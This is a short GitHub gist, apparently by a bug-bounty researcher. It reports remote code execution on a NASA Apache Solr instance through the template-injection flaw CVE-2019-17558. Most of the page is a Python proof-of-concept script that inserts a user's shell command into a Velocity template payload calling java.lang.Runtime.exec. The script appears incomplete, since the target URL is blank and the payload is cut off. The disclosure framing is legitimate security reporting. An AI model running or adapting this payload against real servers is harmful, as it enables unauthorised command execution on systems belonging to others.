Skip to content

Instantly share code, notes, and snippets.


P0cas/ Secret

Last active March 1, 2022 12:50
What would you like to do?
Remote Code Execution - [NASA]


I discovered an RCE vulnerability using 1-Day on at the end of 2021. This vulnerability is SSTI (CVE-2019-17558) in Apache Solr. I am very honored to be able to find these 1-Day exploits on NASA.

Proof of Concept

스크린샷 2022-03-01 21 35 59

import requests

def exploit():
  while True:
      cmd = input(">> ")
      url = "$x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27{}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($".format(cmd)
      print(f'[*] PoC : {url}')
if __name__ == '__main__':
  print("[*] Exploit")
  print("[*] 1-Day : CVE-2019-17558")
  print("[*] URL   :")

I wrote a PoC as above. It is a great honor to contribute to NASA again. Thank You. (For the universe)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment